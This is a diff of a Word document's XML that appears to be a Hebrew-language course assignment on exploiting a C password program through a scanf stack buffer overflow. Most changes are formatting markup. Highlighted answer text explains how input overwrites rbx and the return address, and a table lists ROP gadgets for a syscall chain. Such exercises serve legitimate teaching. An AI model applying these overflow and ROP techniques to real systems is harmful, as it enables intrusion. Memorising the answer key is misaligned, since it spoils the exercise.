         <w:t>;</w:t>
       </w:r>
+      <w:proofErr w:type="gramEnd"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -4372,6 +4751,7 @@
         </w:rPr>
         <w:t xml:space="preserve"> הנכונה שתגרום לפונקציה </w:t>
       </w:r>
+      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:cstheme="minorHAnsi"/>
@@ -4379,6 +4759,7 @@
         </w:rPr>
         <w:t>checkPassword</w:t>
       </w:r>
+      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:cstheme="minorHAnsi"/>
@@ -4426,6 +4807,7 @@
           <w:lang w:val="en-US"/>
         </w:rPr>
       </w:pPr>
+      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
@@ -4436,6 +4818,7 @@
         </w:rPr>
         <w:t>natanz</w:t>
       </w:r>
+      <w:proofErr w:type="spellEnd"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -4669,7 +5052,29 @@
           <w:szCs w:val="21"/>
           <w:lang w:eastAsia="en-IL"/>
         </w:rPr>
-        <w:t xml:space="preserve"> main(){</w:t>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:lang w:eastAsia="en-IL"/>
+        </w:rPr>
+        <w:t>main(</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:lang w:eastAsia="en-IL"/>
+        </w:rPr>
+        <w:t>){</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -4712,8 +5117,20 @@
           <w:szCs w:val="21"/>
           <w:lang w:eastAsia="en-IL"/>
         </w:rPr>
-        <w:t xml:space="preserve"> password[</w:t>
-      </w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:lang w:eastAsia="en-IL"/>
+        </w:rPr>
+        <w:t>password[</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
@@ -4755,8 +5172,32 @@
           <w:szCs w:val="21"/>
           <w:lang w:eastAsia="en-IL"/>
         </w:rPr>
-        <w:t>    printf(</w:t>
-      </w:r>
+        <w:t xml:space="preserve">    </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:lang w:eastAsia="en-IL"/>
+        </w:rPr>
+        <w:t>printf</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:lang w:eastAsia="en-IL"/>
+        </w:rPr>
+        <w:t>(</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
@@ -4798,8 +5239,32 @@
           <w:szCs w:val="21"/>
           <w:lang w:eastAsia="en-IL"/>
         </w:rPr>
-        <w:t>    scanf(</w:t>
-      </w:r>
+        <w:t xml:space="preserve">    </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:lang w:eastAsia="en-IL"/>
+        </w:rPr>
+        <w:t>scanf</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:lang w:eastAsia="en-IL"/>
+        </w:rPr>
+        <w:t>(</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
@@ -4861,8 +5326,42 @@
           <w:szCs w:val="21"/>
           <w:lang w:eastAsia="en-IL"/>
         </w:rPr>
-        <w:t>(checkPassword(password)){</w:t>
-      </w:r>
+        <w:t>(</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:lang w:eastAsia="en-IL"/>
+        </w:rPr>
+        <w:t>checkPassword</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:lang w:eastAsia="en-IL"/>
+        </w:rPr>
+        <w:t>(password</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:lang w:eastAsia="en-IL"/>
+        </w:rPr>
+        <w:t>)){</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -4884,8 +5383,32 @@
           <w:szCs w:val="21"/>
           <w:lang w:eastAsia="en-IL"/>
         </w:rPr>
-        <w:t>        printf(</w:t>
-      </w:r>
+        <w:t xml:space="preserve">        </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:lang w:eastAsia="en-IL"/>
+        </w:rPr>
+        <w:t>printf</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:lang w:eastAsia="en-IL"/>
+        </w:rPr>
+        <w:t>(</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
@@ -4904,8 +5427,20 @@
           <w:szCs w:val="21"/>
           <w:lang w:eastAsia="en-IL"/>
         </w:rPr>
-        <w:t>, password);</w:t>
-      </w:r>
+        <w:t>, password</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:lang w:eastAsia="en-IL"/>
+        </w:rPr>
+        <w:t>);</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -4949,6 +5484,7 @@
         </w:rPr>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
+      <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
@@ -4969,6 +5505,7 @@
         </w:rPr>
         <w:t>;</w:t>
       </w:r>
+      <w:proofErr w:type="gramEnd"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -5013,8 +5550,32 @@
           <w:szCs w:val="21"/>
           <w:lang w:eastAsia="en-IL"/>
         </w:rPr>
-        <w:t>    printf(</w:t>
-      </w:r>
+        <w:t xml:space="preserve">    </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:lang w:eastAsia="en-IL"/>
+        </w:rPr>
+        <w:t>printf</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:lang w:eastAsia="en-IL"/>
+        </w:rPr>
+        <w:t>(</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
@@ -5025,6 +5586,7 @@
         </w:rPr>
         <w:t>"wrong password! After 3 wrong passwords this program will destroy the computer. Good luck. \n"</w:t>
       </w:r>
+      <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
@@ -5035,6 +5597,7 @@
         </w:rPr>
         <w:t>);</w:t>
       </w:r>
+      <w:proofErr w:type="gramEnd"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -5076,7 +5639,18 @@
           <w:szCs w:val="21"/>
           <w:lang w:eastAsia="en-IL"/>
         </w:rPr>
-        <w:t xml:space="preserve"> -</w:t>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:lang w:eastAsia="en-IL"/>
+        </w:rPr>
+        <w:t>-</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -5098,6 +5672,7 @@
         </w:rPr>
         <w:t>;</w:t>
       </w:r>
+      <w:proofErr w:type="gramEnd"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -5160,6 +5735,7 @@
         </w:rPr>
         <w:t xml:space="preserve">הסבירו בקצרה מה הבעיה בקריאה של התוכנית ל </w:t>
       </w:r>
+      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:rStyle w:val="Strong"/>
@@ -5170,6 +5746,7 @@
         </w:rPr>
         <w:t>scanf</w:t>
       </w:r>
+      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:rStyle w:val="Strong"/>
@@ -5499,7 +6076,31 @@
           <w:rtl/>
           <w:lang w:val="en-US"/>
         </w:rPr>
-        <w:t xml:space="preserve">לפתרון הסעיף מומלץ להסתכל בקוד אסמבלי של </w:t>
+        <w:t xml:space="preserve">לפתרון הסעיף מומלץ להסתכל בקוד </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:rtl/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>אסמבלי</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:rtl/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> של </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -5522,6 +6123,7 @@
         </w:rPr>
         <w:t xml:space="preserve"> או להשתמש ב־</w:t>
       </w:r>
+      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:rStyle w:val="Strong"/>
@@ -5532,6 +6134,7 @@
         </w:rPr>
         <w:t>gdb</w:t>
       </w:r>
+      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:rStyle w:val="Strong"/>
@@ -5563,13 +6166,36 @@
         <w:spacing w:line="480" w:lineRule="auto"/>
         <w:rPr>
           <w:rStyle w:val="Strong"/>
+          <w:rFonts w:cs="Arial"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:rtl/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
           <w:rFonts w:cs="Arial" w:hint="cs"/>
           <w:b w:val="0"/>
           <w:bCs w:val="0"/>
-          <w:rtl/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
+          <w:highlight w:val="yellow"/>
+          <w:rtl/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve">הפקודה </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:rFonts w:cs="Arial"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:highlight w:val="yellow"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>ret</w:t>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:rStyle w:val="Strong"/>
@@ -5580,7 +6206,7 @@
           <w:rtl/>
           <w:lang w:val="en-US"/>
         </w:rPr>
-        <w:t xml:space="preserve">הפקודה </w:t>
+        <w:t xml:space="preserve"> תקפוץ לכתובת </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -5591,7 +6217,7 @@
           <w:highlight w:val="yellow"/>
           <w:lang w:val="en-US"/>
         </w:rPr>
-        <w:t>ret</w:t>
+        <w:t>0x6f69636f64696c61</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -5603,7 +6229,7 @@
           <w:rtl/>
           <w:lang w:val="en-US"/>
         </w:rPr>
-        <w:t xml:space="preserve"> תקפוץ לכתובת </w:t>
+        <w:t>.</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -5612,9 +6238,10 @@
           <w:b w:val="0"/>
           <w:bCs w:val="0"/>
           <w:highlight w:val="yellow"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>0x6f69636f64696c61</w:t>
+          <w:rtl/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:br/>
       </w:r>
       <w:r>
         <w:rPr>
@@ -5626,7 +6253,44 @@
           <w:rtl/>
           <w:lang w:val="en-US"/>
         </w:rPr>
-        <w:t>.</w:t>
+        <w:t xml:space="preserve">לאחר הכנסת הסיסמה, 16 התווים </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cstheme="minorHAnsi"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:highlight w:val="yellow"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>supercalifragili</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cstheme="minorHAnsi" w:hint="cs"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:highlight w:val="yellow"/>
+          <w:rtl/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:rFonts w:cs="Arial" w:hint="cs"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:highlight w:val="yellow"/>
+          <w:rtl/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve">ייכנסו לתוך </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -5635,6 +6299,29 @@
           <w:b w:val="0"/>
           <w:bCs w:val="0"/>
           <w:highlight w:val="yellow"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>password</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:rFonts w:cs="Arial" w:hint="cs"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:highlight w:val="yellow"/>
+          <w:rtl/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve">. </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:rFonts w:cs="Arial"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:highlight w:val="yellow"/>
           <w:rtl/>
           <w:lang w:val="en-US"/>
         </w:rPr>
@@ -5650,30 +6337,18 @@
           <w:rtl/>
           <w:lang w:val="en-US"/>
         </w:rPr>
-        <w:t xml:space="preserve">לאחר הכנסת הסיסמה, 16 התווים </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="Strong"/>
-          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cstheme="minorHAnsi"/>
-          <w:b w:val="0"/>
-          <w:bCs w:val="0"/>
-          <w:highlight w:val="yellow"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>supercalifragili</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="Strong"/>
-          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cstheme="minorHAnsi" w:hint="cs"/>
-          <w:b w:val="0"/>
-          <w:bCs w:val="0"/>
-          <w:highlight w:val="yellow"/>
-          <w:rtl/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
+        <w:t xml:space="preserve">מעל </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:rFonts w:cs="Arial"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:highlight w:val="yellow"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>password</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -5685,8 +6360,9 @@
           <w:rtl/>
           <w:lang w:val="en-US"/>
         </w:rPr>
-        <w:t xml:space="preserve">ייכנסו לתוך </w:t>
-      </w:r>
+        <w:t xml:space="preserve"> במחסנית יש את </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:rStyle w:val="Strong"/>
@@ -5696,8 +6372,20 @@
           <w:highlight w:val="yellow"/>
           <w:lang w:val="en-US"/>
         </w:rPr>
-        <w:t>password</w:t>
-      </w:r>
+        <w:t>rb</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:rFonts w:cs="Arial"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:highlight w:val="yellow"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>x</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:rStyle w:val="Strong"/>
@@ -5708,8 +6396,9 @@
           <w:rtl/>
           <w:lang w:val="en-US"/>
         </w:rPr>
-        <w:t xml:space="preserve">. </w:t>
-      </w:r>
+        <w:t xml:space="preserve"> ולכן 8 הבתים הבאים </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:rStyle w:val="Strong"/>
@@ -5717,6 +6406,30 @@
           <w:b w:val="0"/>
           <w:bCs w:val="0"/>
           <w:highlight w:val="yellow"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>sticexpi</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:rFonts w:cs="Arial" w:hint="cs"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:highlight w:val="yellow"/>
+          <w:rtl/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> יידרסו את הערך שלו.</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:rFonts w:cs="Arial"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:highlight w:val="yellow"/>
           <w:rtl/>
           <w:lang w:val="en-US"/>
         </w:rPr>
@@ -5732,8 +6445,9 @@
           <w:rtl/>
           <w:lang w:val="en-US"/>
         </w:rPr>
-        <w:t xml:space="preserve">מעל </w:t>
-      </w:r>
+        <w:t xml:space="preserve">לבסוף 8 הבתים </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:rStyle w:val="Strong"/>
@@ -5743,112 +6457,9 @@
           <w:highlight w:val="yellow"/>
           <w:lang w:val="en-US"/>
         </w:rPr>
-        <w:t>password</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="Strong"/>
-          <w:rFonts w:cs="Arial" w:hint="cs"/>
-          <w:b w:val="0"/>
-          <w:bCs w:val="0"/>
-          <w:highlight w:val="yellow"/>
-          <w:rtl/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> במחסנית יש את </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="Strong"/>
-          <w:rFonts w:cs="Arial"/>
-          <w:b w:val="0"/>
-          <w:bCs w:val="0"/>
-          <w:highlight w:val="yellow"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>rb</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="Strong"/>
-          <w:rFonts w:cs="Arial"/>
-          <w:b w:val="0"/>
-          <w:bCs w:val="0"/>
-          <w:highlight w:val="yellow"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>x</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="Strong"/>
-          <w:rFonts w:cs="Arial" w:hint="cs"/>
-          <w:b w:val="0"/>
-          <w:bCs w:val="0"/>
-          <w:highlight w:val="yellow"/>
-          <w:rtl/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> ולכן 8 הבתים הבאים </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="Strong"/>
-          <w:rFonts w:cs="Arial"/>
-          <w:b w:val="0"/>
-          <w:bCs w:val="0"/>
-          <w:highlight w:val="yellow"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>sticexpi</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="Strong"/>
-          <w:rFonts w:cs="Arial" w:hint="cs"/>
-          <w:b w:val="0"/>
-          <w:bCs w:val="0"/>
-          <w:highlight w:val="yellow"/>
-          <w:rtl/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> יידרסו את הערך שלו.</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="Strong"/>
-          <w:rFonts w:cs="Arial"/>
-          <w:b w:val="0"/>
-          <w:bCs w:val="0"/>
-          <w:highlight w:val="yellow"/>
-          <w:rtl/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="Strong"/>
-          <w:rFonts w:cs="Arial" w:hint="cs"/>
-          <w:b w:val="0"/>
-          <w:bCs w:val="0"/>
-          <w:highlight w:val="yellow"/>
-          <w:rtl/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve">לבסוף 8 הבתים </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="Strong"/>
-          <w:rFonts w:cs="Arial"/>
-          <w:b w:val="0"/>
-          <w:bCs w:val="0"/>
-          <w:highlight w:val="yellow"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
         <w:t>alidocio</w:t>
       </w:r>
+      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:rStyle w:val="Strong"/>
@@ -6220,6 +6831,7 @@
         </w:rPr>
         <w:t xml:space="preserve"> להיעזר ב </w:t>
       </w:r>
+      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:rStyle w:val="Strong"/>
@@ -6230,6 +6842,7 @@
         </w:rPr>
         <w:t>objdump</w:t>
       </w:r>
+      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:rStyle w:val="Strong"/>
@@ -6519,8 +7132,20 @@
                 <w:bCs w:val="0"/>
                 <w:lang w:val="en-US"/>
               </w:rPr>
-              <w:t>op %rdi</w:t>
+              <w:t>op %</w:t>
             </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rStyle w:val="Strong"/>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Arial"/>
+                <w:b w:val="0"/>
+                <w:bCs w:val="0"/>
+                <w:lang w:val="en-US"/>
+              </w:rPr>
+              <w:t>rdi</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
           </w:p>
           <w:p>
             <w:pPr>
@@ -6638,6 +7263,7 @@
                 <w:lang w:val="en-US"/>
               </w:rPr>
             </w:pPr>
+            <w:proofErr w:type="spellStart"/>
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Strong"/>
@@ -6648,6 +7274,7 @@
               </w:rPr>
               <w:t>syscall</w:t>
             </w:r>
+            <w:proofErr w:type="spellEnd"/>
           </w:p>
         </w:tc>
       </w:tr>
@@ -6740,8 +7367,20 @@
                 <w:bCs w:val="0"/>
                 <w:lang w:val="en-US"/>
               </w:rPr>
-              <w:t>pop %rax</w:t>
+              <w:t>pop %</w:t>
             </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rStyle w:val="Strong"/>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Arial"/>
+                <w:b w:val="0"/>
+                <w:bCs w:val="0"/>
+                <w:lang w:val="en-US"/>
+              </w:rPr>
+              <w:t>rax</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
           </w:p>
           <w:p>
             <w:pPr>
@@ -6877,8 +7516,20 @@
                 <w:bCs w:val="0"/>
                 <w:lang w:val="en-US"/>
               </w:rPr>
-              <w:t>op %rsi</w:t>
+              <w:t>op %</w:t>
             </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rStyle w:val="Strong"/>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Arial"/>
+                <w:b w:val="0"/>
+                <w:bCs w:val="0"/>
+                <w:lang w:val="en-US"/>
+              </w:rPr>
+              <w:t>rsi</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
           </w:p>
           <w:p>
             <w:pPr>
@@ -7075,8 +7726,9 @@
                 <w:bCs w:val="0"/>
